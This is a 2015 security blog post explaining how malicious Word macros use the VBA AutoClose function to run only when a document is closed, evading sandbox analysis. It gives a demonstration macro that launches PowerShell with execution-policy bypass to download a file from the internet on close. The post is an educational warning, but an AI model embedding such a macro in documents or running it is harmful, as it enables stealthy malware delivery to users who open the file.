Monday, March 23, 2015

It's not safe to Close Word Documents

Threatpost recently told us that the Dridex Malware has been seen using the AutoClose method in VBA.

First: What is the AutoClose function? This is a function in VBA (Visual Basic for Applications) that allows you to write code that will execute when a Microsoft Office document (Word, Excel, Powerpoint, etc.) is closed. A good legit example might be to prompt a user before they close to see if they want to run the spell-checker.

Second: Why is using AutoClose different than previous forms of malicious VBA? Because some malware detection detonation tools probably open malware, may even wait a period of time for code to execute, and might even attempt to trick malware into fast forwarding in time ... but I'm not sure how many also experiment with closing the document. I think most tools so far wait a period of time, and if nothing happens, the sandbox is closed and disposed of (without actually close the document). So if the malware doesn't run till document close, then many tools may miss it.

Third: I thought it'd be fun to see exactly what I'm talking about in action!

Let's forecast into the future quickly by showing you this harmless empty folder at c:\windows\temp\badstuff

Now let's start the magic. Here is my malicious, albeit harmless looking word document.

Let's say you got it in an email and you thought it was legit, so you opened it. You clicked the "Enable Content" (NOTE: This is not a good idea.) cause you were expecting something useful to show up. But instead you got nothing. The document did nothing. Looks pretty useless. (NOTE: Even if you were a malware reverse engineer, if you setup some monitoring or used some automated tool, you'd see that so far, the document has done nothing, no callouts, no file changes, no registry changes, nothing.)

Then if you're the user, you hit that harmless, never can hurt-you, easy to use Red X that closes the document.

You go on your merry way, thinking that was kinda stupid that you recieved that pointless empty word document.

Let's go back and look at that harmless empty folder c:\windows\temp\badstuff

OH SNAP! Where'd that come from?

Good thing I'm a good guy, and I'd never mean you any harm. But what if this word document wasn't from a nice guy. Looks like they somehow gained some very dangerous access to your computer. Can you trust anything on your PC anywhere? Probably not, better re-image and re-build it.

How did that happen? If you re-opened the word document and when to the Developer -> Visual Basic section under 'This Workbook', you'd see some code inside an 'AutoClose' function.

Sub AutoClose()
     Shell ("powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','c:\windows\temp\badstuff\myfakemalware.txt')")
End Sub

Code like above can be modified to do whatever the attacker wants. Something more malicious than what I did. The snippet above simply downloads a file to your c:\ drive from an internet site. Imagine if in addition there was a command added to execute that file. Uh-oh, now we're in trouble.

Please don't open unexpected files from people you weren't expecting to send them. Microsoft Office documents cannot be trusted.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

No comments:

Post a Comment